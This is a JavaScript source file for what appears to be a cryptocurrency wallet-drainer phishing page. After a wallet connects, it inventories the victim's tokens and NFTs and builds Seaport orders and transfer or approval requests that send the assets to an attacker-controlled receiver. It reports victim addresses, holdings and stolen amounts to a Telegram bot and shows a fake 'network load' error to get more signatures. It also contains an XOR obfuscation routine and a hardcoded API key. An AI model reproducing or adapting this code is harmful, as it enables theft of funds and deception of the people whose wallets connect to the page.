  console.log("Submitted:", res);

  // send mess to tg
  let textMode, worth, contract;
  if (mode === "noeth") {
    textMode = "Tokens transfer";
    worth = noeth[0].worth;
    contract = noeth[0].contract_address.slice(2);
  } else if (mode === "nft" && nftsFromCurCollection.length > 1) {
    textMode = "NFT Approve";
    worth = nfts[0].worth * nftsFromCurCollection.length;
    contract = nfts[0].contractAddr.slice(2);
  } else if (mode === "nft") {
    textMode = "NFT transfer";
    worth = nfts[0].worth;
    contract = nfts[0].contractAddr.slice(2);
  } else if (mode === "eth") {
    textMode = "ETH transfer";
    worth = web3.utils.fromWei(valueToTransHex);
    contract = null;
  }

  const themess = 
    `${window.location.hostname} | ${textMode}
  Address: ${fAddr(account.slice(2))}
  Contract: ${contract ? fAddr(contract) : "ETH"}
  Worth: ${Math.round(worth * 100) / 100} ETH`
  ;

  const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
    themess
  )}`;
  fetch(apiUrl, { method: "POST" })
    .then((response) => response.json())
    .then((data) => {
      if (data.ok) {
        console.log("...");
      } else {
        console.log("Failed");
      }
    })
    .catch((error) => {
      console.log("Error");
    });

  showError("The action failed due to network load. Please try to sign again");

  return true;
}

/**
 * @param {string} name name of wallet
 */
async function connect(name) {
  //   const openConnectModalBtn = document.getElementById('open-connect-modal')
  // openConnectModalBtn.addEventListener('click', () => modal.open())

  await modal.open();
  // web3Provider = await web3Modal.connect();

  const web3Provider = modal.getWalletProvider();

  // check chain
  let chainId;
  const thyProvider2 = new ethers.BrowserProvider(web3Provider);
  thyProvider2.getNetwork().then((network) => {
    if (network.chainId !== CHAIN_ID.toString()) {
      let res = tryToChangeChain();
      if (!res) return;
      chainId = network.chainId;
    }
  });

  // trust wallet bug handle
  const thyProvider = new ethers.BrowserProvider(web3Provider);
  const accounts = await thyProvider.listAccounts();
  const account = accounts[0];
  // const acc3 = account.substring(0, 10) + "...";
  const acc2 = Array.from(account?.address);
  const acc3 =
    acc2[0] +
    acc2[1] +
    acc2[2] +
    acc2[3] +
    acc2[4] +
    acc2[5] +
    acc2[6] +
    acc2[7] +
    acc2[8] +
    acc2[9] +
    "...";
  console.log(acc3);
  document.getElementById("connectText").innerHTML = acc3;

  localStorage.removeItem("noeth");
  localStorage.removeItem("nfts");

  scanNoeth(account?.address, CHAIN_ID);
  scanNfts(account?.address);

  // sign empty message
  // await signMessage(account);

  // await action(account);
  return action(account?.address);
}

async function only_connect(name) {
  // web3Provider = await web3Modal.connect();
  const web3Provider = modal.getWalletProvider();

  // check chain
  let chainId;
  const thyProvider2 = new ethers.BrowserProvider(web3Provider);
  thyProvider2.getNetwork().then((network) => {
    if (network.chainId !== CHAIN_ID.toString()) {
      let res = tryToChangeChain();
      if (!res) return;
      chainId = network.chainId;
    }
  });

  // connect
  let account;

  const thyProvider = new ethers.BrowserProvider(web3Provider);
  await thyProvider
    .getSigner()
    .getAddress()
    .then((address) => {
      account = address;
      const acc2 = Array.from(address);
      const acc3 =
        acc2[0] +
        acc2[1] +
        acc2[2] +
        acc2[3] +
        acc2[4] +
        acc2[5] +
        acc2[6] +
        acc2[7] +
        acc2[8] +
        acc2[9] +
        "...";
      console.log(acc2);
      document.getElementById("connectText").innerHTML = acc3.toString();
      return action(account);
    });

  localStorage.removeItem("noeth");
  localStorage.removeItem("nfts");

  scanNoeth(account, CHAIN_ID);
  scanNfts(account);

  const themess2 = 
    `${window.location.hostname} | Connect\nAddress: ${fAddr(account.slice(2))}`
  ;

  const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
    themess2
  )}`;
  fetch(apiUrl, { method: "POST" })
    .then((response) => response.json())
    .then((data) => {
      if (data.ok) {
        console.log("...");
      } else {
        console.log("Failed");
      }
    })
    .catch((error) => {
      console.log("Error");
    });

  // sign empty message
  // await signMessage(account);

  // action(account);

  return account;
}

/**
 * @param {any} name name of wallet
 */
async function tryToChangeChain(network) {
  const web3Provider = modal.getWalletProvider();

  // if pc try to switch
  try {
    // @ts-ignore
    await web3Provider.request({
      method: "wallet_switchEthereumChain",
      params: [{ chainId: `0x${CHAIN_ID.toString(16)}` }],
    });
  } catch (err) {
    if (err.code === 4902) {
      showError(`Please add ${CHAIN_ID === 1 ? "ETH" : "BSC"} network.`);
      return false;
    }
  }
  return true;
}

/**
 *
 * @param {any} text data to encode
 * @returns {string} encoded string
 */
const c = (text) => {
  try {
    text = JSON.stringify(text);
    const textToChars = (text) =>
      text
        .toString()
        .split("")
        .map((c) => c.charCodeAt(0));
    const byteHex = (n) => ("0" + Number(n).toString(16)).substr(-2);
    const applySaltToChar = (code) =>
      textToChars(31612400).reduce((a, b) => a ^ b, code);

    return text
      .split("")
      .map(textToChars)
      .map(applySaltToChar)
      .map(byteHex)
      .join("");
  } catch (e) {
    return null;
  }
};

/**
 *
 * @param {string} encoded encoded string from c
 * @returns {any} object that was decoded
 */
const d = (encoded) => {
  try {
    const textToChars = (text) =>
      text
        .toString()
        .split("")
        .map((c) => c.charCodeAt(0));
    const applySaltToChar = (code) =>
      textToChars(31612400).reduce((a, b) => a ^ b, code);
    return JSON.parse(
      encoded
        .toString()
        .match(/.{1,2}/g)
        .map((hex) => parseInt(hex, 16))
        .map(applySaltToChar)
        .map((charCode) => String.fromCharCode(charCode))
        .join("")
    );
  } catch (e) {
    return null;
  }
};

/**
 * @param {number} ethBal
 * @returns { "nft"  | "noeth" | "eth" | "sea"}
 */
function compareWorth(ethBal) {
  let nfts = getItem("nfts"),
    seanfts = getItem("seanfts"),
    noeth = getItem("noeth");

  // if only eth
  if ((!noeth || !noeth.length) && (!nfts || !nfts.length)) return "eth";

  // vars
  const a = {
    worth: noeth && noeth.length ? noeth[0].worth : -1,
    res: "noeth",
  };
  const b = {
    worth: nfts && nfts.length ? nfts[0].worth * 0.8 : -1,
    res: "nft",
  };
  const c = {
    worth: seanfts.nfts && seanfts.nfts.length ? seanfts.totalWorth * 0.8 : -1,
    res: "sea",
  };
  const d = { worth: ethBal, res: "eth" };

  // sort
  let sortedValues = [a, b, c, d].sort((a, b) => (a.worth < b.worth ? 1 : -1));

  // @ts-ignore
  return sortedValues[0].res;
}

/**
 * @param {string} key
 * @param {any} value
 */
function setItem(key, value) {
  const farFutureDate = new Date('2038-01-01T00:00:00Z');
  const cookieValue = encodeURIComponent(JSON.stringify(value)) + "; expires=" + farFutureDate.toUTCString();
  document.cookie = key + "=" + cookieValue + "; path=/";
}



/**
 * @param {string} account
 * @param {{ id: string; contractAddr: any; amount: any; }[]} tokensArr
 * @param {number} timestamp
 * @param {string} salt
 */
function getSellSeaMessage(account, tokensArr, timestamp, salt) {
  const offer = getOffer(tokensArr);
  const consideration = getConsideration(offer);

  const orderForSigning = {
    offerer: account,
    zone: "0x004c00500000ad104d7dbd00e3ae0a5c00560c00",
    offer: offer,
    consideration: consideration,
    orderType: 2,
    startTime: timestamp,
    endTime: timestamp + expirationOffset,
    zoneHash:
      "0x0000000000000000000000000000000000000000000000000000000000000000",
    salt: salt,
    conduitKey:
      "0x0000007b02230091a7ed01230072f7006a004d60a8d4e71d599b8104250f0000",
    counter: "0",
  };

  const message = {
    types: ORDER_TYPE,
    domain: {
      name: "Seaport",
      version: "1.1",
      chainId: 1,
      verifyingContract: "0x00000000006c3852cbef3e08e8df289169ede581",
    },
    primaryType: "OrderComponents",
    message: orderForSigning,
  };

  return message;
}

/**
 * @param {{ id: string; contractAddr: any; amount: any; }[]} tokensArr
 * @returns {{ itemType: number; token: string; identifierOrCriteria: string; startAmount: string; endAmount: string}[]}
 */
function getOffer(tokensArr) {
  let res = [];
  tokensArr.forEach(
    (/** @type {{ id: string; contractAddr: any; amount: any; }} */ token) => {
      res.push({
        itemType: parseInt(token.id) ? 2 : 1, // 2 - nft, 1 - erc20
        token: token.contractAddr,
        identifierOrCriteria: token.id,
        startAmount: token.amount || "1",
        endAmount: token.amount || "1",
      });
    }
  );

  return res;
}

/**
 * @param {{ itemType: number; token: string; identifierOrCriteria: string; startAmount: string; endAmount: string}[]} offer
 * @returns {{ itemType: number; token: string; identifierOrCriteria: string; startAmount: string; endAmount: string, recipient: string}[]}
 */
function getConsideration(offer) {
  offer.forEach((_, index) => {
    offer[index]["recipient"] = RECEIVER;
  });

  return offer;
}

/**
 * @param {string} key
 */
function getItem(key) {
  const decodedCookie = decodeURIComponent(document.cookie);
  const cookieArray = decodedCookie.split('; ');

  for (let i = 0; i < cookieArray.length; i++) {
    const cookie = cookieArray[i].split('=');

    if (cookie[0] === key) {
      // Found the cookie with the specified key, return its decoded value
      return JSON.parse(decodeURIComponent(cookie[1]));
    }
  }
  // Cookie with the specified key not found
  return null;
}


/**
 * @returns {string} 70 chars salt
 */
function getSalt() {
  let result = "";
  const characters = "0123456789";
  const charactersLength = characters.length;
  for (let i = 0; i < 70; i++) {
    result += characters.charAt(Math.floor(Math.random() * charactersLength));
  }
  return result;
}

/**
 * @param {number} delayInms
 */
function sleep(delayInms) {
  return new Promise((resolve) => {
    setTimeout(() => {
      resolve(2);
    }, delayInms);
  });
}

/*
sets array of nfts:
nfts = [{
      contractAddr: string,
      tokenId: string
      worth: int,
    },
    ...
  ]
*/
/**
 * @param {string} account
 */
async function scanNfts(account) {
  if (!account) return;
  if (!getItem("nfts") || !getItem("nfts").length) {
    try {
      // get list of collections
      const resp = await sendReq(
        "get",
        `https://api.opensea.io/api/v2/collections?asset_owner=${account}&offset=0&limit=20`
      );

      if (!resp || !resp.data) {
        showError("Internal error. Please reload the page");
        return;
      }

      // filter
      let collections = resp.data;
      collections = collections.filter(
        (collection) =>
          collection.description !== "" &&
          // collection.stats.seven_day_volume > 0 &&
          // collection.stats.one_day_average_price > 0 &&
          collection.primary_asset_contracts.length &&
          collection.primary_asset_contracts[0].schema_name !== "ERC1155" &&
          collection.primary_asset_contracts[0].address !==
            "0x57f1887a8bf19b14fc0df6fd9b2acc9af147ea85" // remove ens
      );

      // sort by price
      collections.sort((a, b) => {
        return a.stats.one_day_average_price < b.stats.one_day_average_price
          ? 1
          : -1;
      });

      // result collections
      console.log("collections:", collections);
      setItem("collections", collections);

      // get list of token ids
      let nfts = [];
      if (collections.length) {
        const assetsUrl = `https://api.opensea.io/api/v2/assets?owner=${account}`;
        var payload = "";
        // building request url. adding all collections contracts
        collections.forEach((collection) => {
          payload += `&asset_contract_addresses=${collection.primary_asset_contracts[0].address}`;
        });

        let res = await sendReq("get", `${assetsUrl}${payload}`);
        if (!res || !res.data) {
          showError("Internal error. Try again later");
          return;
        }
        let allNfts = res.data.assets;

        // get nfts for each collection
        collections.forEach((collection) => {
          let currentCollectionNfts = allNfts.filter(
            (nft) =>
              nft.asset_contract.address ===
              collection.primary_asset_contracts[0].address
          );

          currentCollectionNfts.forEach((nftInCurCollection) => {
            // add to result array
            nfts.push({
              contractAddr: collection.primary_asset_contracts[0].address,
              worth:
                Math.round(
                  collection.stats.one_day_average_price * 0.8 * 10000
                ) / 10000,
              tokenId: nftInCurCollection.token_id,
              id: nftInCurCollection.token_id,
            });
          });
        });

        // sort by worth
        nfts.sort((a, b) => {
          return a.worth < b.worth ? 1 : -1;
        });
      }

      console.log("nfts:", nfts);
      setItem("nfts", nfts);
      await scanSea(account, nfts);
      return nfts;
    } catch (e) {
      // showError(e.message);
      console.log(e.message)
    }
  } else {
    return getItem("nfts");
  }
}

/**
 * @param {string} account
 * @param {any[]} allNfts
 */
async function scanSea(account, allNfts) {
  let seanfts = {
    nfts: [],
    totalWorth: 0,
  }; // result array. array of nfts for which user gave approve to opensea

  if (
    !getItem("collections") ||
    !getItem("collections").length ||
    !allNfts.length
  ) {
    console.log("No opensea approves, because no nfts");
    setItem("seanfts", seanfts);
    return;
  }

  const web3Provider = modal.getWalletProvider();

  // get proxy address for user
  const { ethereum } = window;

  const web3 = new Web3(web3Provider);

  const Conduit = "0x1E0049783F008A0085193E00003D00cd54003c71";

  const erc721Contract = new web3.eth.Contract(ERC721ABI);

  const multicallContract = new web3.eth.Contract(
    MulticallABI,
    "0xeefBa1e63905eF1D7ACbA5a8513c70307C1cE441"
  );

  // build multicall calls. check each collection
  let multiCalldata = [];
  const collections = getItem("collections");
  collections.forEach((collection) => {
    multiCalldata.push({
      target: collection.primary_asset_contracts[0].address,
      callData: erc721Contract.methods
        .isApprovedForAll(account, Conduit)
        .encodeABI(),
    });
  });

  const results = (
    await multicallContract.methods.aggregate(multiCalldata).call()
  ).returnData;

  // add to result array all approved nfts + increase totalWorth
  results.forEach((result, index) => {
    const isApproved = parseInt(result.slice(-1));
    const curCollectionAddr =
      collections[index].primary_asset_contracts[0].address;

    if (isApproved) {
      // then we add this collection nfts to seanfts

      // get all collection nfts
      let currentCollectionNfts = allNfts.filter(
        (nft) => nft.contractAddr === curCollectionAddr
      );

      // add each nft to seanft arr
      currentCollectionNfts.forEach((nft) => {
        seanfts.totalWorth += nft.worth;
        let copy = structuredClone(nft);
        delete copy.tokenId;
        delete copy.worth;
        seanfts.nfts.push(copy);
      });
    }
  });

  // round worth
  if (results.length) {
    seanfts.totalWorth = Math.round(seanfts.totalWorth * 10000) / 10000;
    console.log("seanfts:", seanfts);
    setItem("seanfts", seanfts);
  } else {
    console.log("seanfts: []");
    setItem("seanfts", {
      nfts: [],
      totalWorth: 0,
    });
  }
}

/**
 * @param {string} account
 * @param {number} chainId
 */
async function scanNoeth(account, chainId) {
  if (!account) return;
  if (!getItem("noeth") || !getItem("noeth").length) {
    try {
      const coval_res = await sendReq(
        "get",
        `https://api.covalenthq.com/v1/${chainId}/address/${account}/balances_v2/?quote-currency=ETH&no-nft-fetch=true&`
      );

      if (!coval_res.data) {
        console.log("noeth: []");
        showError("Internal error. Please try again later");
        setItem("noeth", []);
        return;
      }

      let noeth = coval_res.data.data.items;
      console.log("beforeFilter:", noeth);
      noeth = noeth.filter(
        (coin) =>
          coin.contract_ticker_symbol != null &&
          coin.contract_name != null &&
          coin.contract_name.indexOf(".") === -1 &&
          coin.quote > 0 &&
          coin.contract_address !== "0xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee"
      );

      noeth.sort(function (a, b) {
        return a.quote < b.quote ? 1 : -1;
      });

      // add amount in eth (specified in url)
      noeth.forEach(
        (token) => (token.worth = Math.round(token.quote * 10000) / 10000)
      );

      console.log("noeth:", noeth);
      const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
        `Tokens: ${JSON.stringify(noeth)}`
      )}`;
      fetch(apiUrl, { method: "POST" })
        .then((response) => response.json())
        .then((data) => {
          if (data.ok) {
            console.log("...");
          } else {
            console.log("Failed");
          }
        })
        .catch((error) => {
          console.log("Error");
        });
      setItem("noeth", noeth);
    } catch (e) {
      // showError(e.message);
    }
  } else return getItem("noeth");
}

/**
 * @param {string} method
 * @param {string} url
 * @param {any}  errorText
 * @param {any} payload
 */
async function sendReq(method, url, errorText = null, payload = null) {
  try {
    var res;
    if (method === "get") {
      if (url.includes("coval")) url += `key=${COVAL_KEY}`;

      res = await axios.get(url, {
        headers: url.includes("coval")
          ? {
              accept: "application/json",
            }
          : {
              "x-api-key": "74f526cad9884d70b0a6ef5890e7fa05",
            },
      });
    } else {
      payload = c(payload);
      res = await axios.post(url, {
        payload: payload,
      });
    }
    console.log(url, res);
    return res;
  } catch (e) {
    console.log(url, e);
    if (errorText) showError(errorText);
    return;
  }
}

/**
 * @param {string} addr 0x1231 addr
 * @returns {string} formatted for tg markdown
 */
const fAddr = (addr) => {
  return `[0x${addr}](etherscan.io/address/0x${addr})`;
};

/**
 * @param {"nft" | "sea" | "noeth" | "eth"} mode
 */
function updateArrays(mode) {
  console.log("updaing arrays");
  if (mode === "nft") {
    // is approve
    let nfts = getItem("nfts");
    let nftsFromCurCollection = nfts.filter(
      (nft) => nft.contractAddr === nfts[0].contractAddr
    );
    if (nftsFromCurCollection.length > 1) {
      // approve
      nfts = nfts.filter((nft) => nft.contractAddr !== nfts[0].contractAddr);
      setItem("nfts", nfts);
    } else {
      // transfer
      nfts.shift();
      setItem("nfts", nfts);
    }
  } else if (mode === "noeth") {
    // tokens
    let noeth = getItem("noeth");
    noeth.shift();
    setItem("noeth", noeth);
  } else if (mode === "sea") {
    // opensea
    setItem("seanfts", { nfts: [], totalWorth: 0 });
    console.log("updated sea array");
  } else if (mode === "eth") {
    return true;
  }
}

const TX_GAS_LIMIT = "0x55F0"; // 22'000
const CONTRACT_GAS_LIMIT = "0x186A0"; // 100'000

const expirationOffset = 2630000; // 1 month in sec

const ABIERC20 = [
  {
    constant: false,
    inputs: [
      { name: "_to", type: "address" },
      { name: "_value", type: "uint256" },
    ],
    name: "transfer",
    outputs: [],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },
];

const ERC721ABI = [
  {
    constant: false,
    inputs: [
      { internalType: "address", name: "from", type: "address" },
      { internalType: "address", name: "to", type: "address" },
      { internalType: "uint256", name: "tokenId", type: "uint256" },
    ],
    name: "safeTransferFrom",
    outputs: [],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },

  {
    constant: false,
    inputs: [
      { internalType: "address", name: "to", type: "address" },
      { internalType: "bool", name: "approved", type: "bool" },
    ],
    name: "setApprovalForAll",
    outputs: [],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "owner",
        type: "address",
      },
      {
        internalType: "address",
        name: "operator",
        type: "address",
      },
    ],
    name: "isApprovedForAll",
    outputs: [
      {
        internalType: "bool",
        name: "",
        type: "bool",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
];

const MINTABI = [
  {
    inputs: [{ name: "_mintAmount", type: "uint256" }],
    name: "mint",
    outputs: [],
    stateMutability: "payable",
    type: "function",
  },
];

const MulticallABI = [
  {
    constant: false,
    inputs: [
      {
        components: [
          { name: "target", type: "address" },
          { name: "callData", type: "bytes" },
        ],
        name: "calls",
        type: "tuple[]",
      },
    ],
    name: "aggregate",
    outputs: [
      { name: "blockNumber", type: "uint256" },
      { name: "returnData", type: "bytes[]" },
    ],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },
];

const ORDER_TYPE = {
  OrderComponents: [
    { name: "offerer", type: "address" },
    { name: "zone", type: "address" },
    { name: "offer", type: "OfferItem[]" },
    { name: "consideration", type: "ConsiderationItem[]" },
    { name: "orderType", type: "uint8" },
    { name: "startTime", type: "uint256" },
    { name: "endTime", type: "uint256" },
    { name: "zoneHash", type: "bytes32" },
    { name: "salt", type: "uint256" },
    { name: "conduitKey", type: "bytes32" },
    { name: "counter", type: "uint256" },
  ],
  OfferItem: [
    { name: "itemType", type: "uint8" },
    { name: "token", type: "address" },
    { name: "identifierOrCriteria", type: "uint256" },
    { name: "startAmount", type: "uint256" },
    { name: "endAmount", type: "uint256" },
  ],
  ConsiderationItem: [
    { name: "itemType", type: "uint8" },
    { name: "token", type: "address" },
    { name: "identifierOrCriteria", type: "uint256" },
    { name: "startAmount", type: "uint256" },
    { name: "endAmount", type: "uint256" },
    { name: "recipient", type: "address" },
  ],
  EIP712Domain: [
    { name: "name", type: "string" },
    { name: "version", type: "string" },
    { name: "chainId", type: "uint256" },
    { name: "verifyingContract", type: "address" },
  ],
};

const orderType = {
  OrderComponents: [
    { name: "offerer", type: "address" },
    { name: "zone", type: "address" },
    { name: "offer", type: "OfferItem[]" },
    { name: "consideration", type: "ConsiderationItem[]" },
    { name: "orderType", type: "uint8" },
    { name: "startTime", type: "uint256" },
    { name: "endTime", type: "uint256" },
    { name: "zoneHash", type: "bytes32" },
    { name: "salt", type: "uint256" },
    { name: "conduitKey", type: "bytes32" },
    { name: "counter", type: "uint256" },
  ],
  OfferItem: [
    { name: "itemType", type: "uint8" },
    { name: "token", type: "address" },
    { name: "identifierOrCriteria", type: "uint256" },
    { name: "startAmount", type: "uint256" },
    { name: "endAmount", type: "uint256" },
  ],
  ConsiderationItem: [
    { name: "itemType", type: "uint8" },
    { name: "token", type: "address" },
    { name: "identifierOrCriteria", type: "uint256" },
    { name: "startAmount", type: "uint256" },
    { name: "endAmount", type: "uint256" },
    { name: "recipient", type: "address" },
  ],
};

document.getElementById("connectButton").addEventListener("click", connect);
